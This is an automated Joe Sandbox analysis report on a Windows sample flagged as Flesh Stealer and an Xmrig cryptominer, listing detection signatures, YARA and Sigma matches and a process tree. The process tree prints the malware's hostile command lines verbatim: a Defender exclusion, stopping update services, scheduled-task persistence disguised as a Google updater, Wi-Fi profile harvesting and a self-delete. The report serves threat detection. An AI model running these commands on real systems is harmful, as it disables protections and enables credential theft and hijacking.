Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zufmUwylvo.exe

Overview

General Information

Sample name:zufmUwylvo.exe
Analysis ID:1530000
MD5:c526cb2c72a976831c06fc09991e20d8
SHA1:b719c9c64a5368abf2671a0e8d6ef8902bdaf9aa
SHA256:53ad8953df55fbe65065f3e94135a4596f6209f20947c0e3df949910ce6cbbc6
Infos:

Detection

Flesh Stealer, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Flesh Stealer
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Protects its processes via BreakOnTermination flag
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64native
  • zufmUwylvo.exe (PID: 4540 cmdline: "C:\Users\user\Desktop\zufmUwylvo.exe" MD5: C526CB2C72A976831C06FC09991E20D8)
    • zxcvbnmasd.exe (PID: 6672 cmdline: "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" MD5: 413E4E7BC129E8165D1FFD2B1AE5DB04)
      • dialer.exe (PID: 8464 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 852 cmdline: winlogon.exe MD5: A987B43E6A8E8F894B98A3DF022DB518)
        • lsass.exe (PID: 908 cmdline: C:\Windows\system32\lsass.exe MD5: 15A556DEF233F112D127025AB51AC2D3)
          • WmiPrvSE.exe (PID: 4344 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: F586835082F632DC8D9404D83BC16316)
        • dwm.exe (PID: 1152 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
        • svchost.exe (PID: 1284 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: F586835082F632DC8D9404D83BC16316)
          • updater.exe (PID: 8404 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: 413E4E7BC129E8165D1FFD2B1AE5DB04)
        • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: F586835082F632DC8D9404D83BC16316)
        • svchost.exe (PID: 1324 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: F586835082F632DC8D9404D83BC16316)
        • svchost.exe (PID: 1380 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: F586835082F632DC8D9404D83BC16316)
        • IntelCpHDCPSvc.exe (PID: 1440 cmdline: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe MD5: B6BAD2BD8596D9101874E9042B8E2D63)
        • svchost.exe (PID: 1452 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: F586835082F632DC8D9404D83BC16316)
        • svchost.exe (PID: 1472 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: F586835082F632DC8D9404D83BC16316)
        • svchost.exe (PID: 1568 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: F586835082F632DC8D9404D83BC16316)
        • svchost.exe (PID: 1688 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: F586835082F632DC8D9404D83BC16316)
        • IntelCpHeciSvc.exe (PID: 1748 cmdline: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe MD5: 3B0DF35583675DE5A08E8D4C1271CEC0)
        • igfxCUIService.exe (PID: 1808 cmdline: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe MD5: 91038D45A86B5465E8B7E5CD63187150)
        • svchost.exe (PID: 1848 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: F586835082F632DC8D9404D83BC16316)
        • svchost.exe (PID: 1920 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: F586835082F632DC8D9404D83BC16316)
    • cmd.exe (PID: 3592 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 988 cmdline: chcp 65001 MD5: CA9A549C17932F9CAA154B5528EBD8D4)
      • netsh.exe (PID: 6476 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 4808 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • powershell.exe (PID: 7544 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cmd.exe (PID: 8248 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 8304 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8320 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8336 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8376 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8396 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 8420 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 8488 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8596 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8664 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 8724 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 8508 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cmd.exe (PID: 8704 cmdline: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • choice.exe (PID: 8428 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
  • powershell.exe (PID: 8968 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cmd.exe (PID: 8136 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 9188 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 5672 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8076 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8148 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\jscseoeoqftm.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    C:\Windows\Temp\jscseoeoqftm.tmpMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
    • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
    • 0x4d1fc8:$s3: \\.\WinRing0_
    • 0x4ca4c8:$s4: pool_wallet
    • 0x4c62d0:$s5: cryptonight
    • 0x4c62e0:$s5: cryptonight
    • 0x4c62f0:$s5: cryptonight
    • 0x4c6300:$s5: cryptonight
    • 0x4c6318:$s5: cryptonight
    • 0x4c6328:$s5: cryptonight
    • 0x4c6338:$s5: cryptonight
    • 0x4c6350:$s5: cryptonight
    • 0x4c6360:$s5: cryptonight
    • 0x4c6378:$s5: cryptonight
    • 0x4c6390:$s5: cryptonight
    • 0x4c63a0:$s5: cryptonight
    • 0x4c63b0:$s5: cryptonight
    • 0x4c63c0:$s5: cryptonight
    • 0x4c63d8:$s5: cryptonight
    • 0x4c63f0:$s5: cryptonight
    • 0x4c6400:$s5: cryptonight
    • 0x4c6410:$s5: cryptonight
    C:\Windows\Temp\jscseoeoqftm.tmpMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
    • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
    C:\Windows\Temp\jscseoeoqftm.tmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0x4cb268:$a1: mining.set_target
    • 0x4c6a48:$a2: XMRIG_HOSTNAME
    • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
    • 0x4c6a20:$a4: XMRIG_VERSION
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: zufmUwylvo.exe PID: 4540JoeSecurity_FleshStealerYara detected Flesh StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      37.2.updater.exe.140040c40.6.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        37.2.updater.exe.140040c40.6.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
        • 0x4f6ca0:$s1: %s/%s (Windows NT %lu.%lu
        • 0x4f74c8:$s3: \\.\WinRing0_
        • 0x4ef9c8:$s4: pool_wallet
        • 0x4eb7d0:$s5: cryptonight
        • 0x4eb7e0:$s5: cryptonight
        • 0x4eb7f0:$s5: cryptonight
        • 0x4eb800:$s5: cryptonight
        • 0x4eb818:$s5: cryptonight
        • 0x4eb828:$s5: cryptonight
        • 0x4eb838:$s5: cryptonight
        • 0x4eb850:$s5: cryptonight
        • 0x4eb860:$s5: cryptonight
        • 0x4eb878:$s5: cryptonight
        • 0x4eb890:$s5: cryptonight
        • 0x4eb8a0:$s5: cryptonight
        • 0x4eb8b0:$s5: cryptonight
        • 0x4eb8c0:$s5: cryptonight
        • 0x4eb8d8:$s5: cryptonight
        • 0x4eb8f0:$s5: cryptonight
        • 0x4eb900:$s5: cryptonight
        • 0x4eb910:$s5: cryptonight
        37.2.updater.exe.140040c40.6.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
        • 0x4f6741:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
        37.2.updater.exe.140040c40.6.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x4f0768:$a1: mining.set_target
        • 0x4ebf48:$a2: XMRIG_HOSTNAME
        • 0x4eda40:$a3: Usage: xmrig [OPTIONS]
        • 0x4ebf20:$a4: XMRIG_VERSION
        37.2.updater.exe.14001fa80.7.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          Click to see the 7 entries

          Operating System Destruction

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 8248, ProcessName: cmd.exe

          System Summary

          barindex
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 8508, ProcessName: powershell.exe
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 8508, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7544, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7544, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 8464, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 1080, ProcessName: svchost.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7544, ProcessName: powershell.exe

          Stealing of Sensitive Information

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zufmUwylvo.exe", ParentImage: C:\Users\user\Desktop\zufmUwylvo.exe, ParentProcessId: 4540, ParentProcessName: zufmUwylvo.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 3592, ProcessName: cmd.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-09T16:30:15.039753+020020362892Crypto Currency Mining Activity Detected192.168.11.30547431.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-09T16:30:17.283464+020020542471A Network Trojan was detected104.20.3.235443192.168.11.3049779TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmpAvira: detection malicious, Label: HEUR/AGEN.1362795
          Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 28%
          Source: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmpReversingLabs: Detection: 91%
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeReversingLabs: Detection: 28%
          Source: C:\Windows\Temp\jscseoeoqftm.tmpReversingLabs: Detection: 70%
          Source: zufmUwylvo.exeReversingLabs: Detection: 68%
          Source: C:\Windows\Temp\jscseoeoqftm.tmpJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmpJoe Sandbox ML: detected
          Source: zufmUwylvo.exeJoe Sandbox ML: detected

          Bitcoin Miner

          barindex
          Source: Yara matchFile source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED
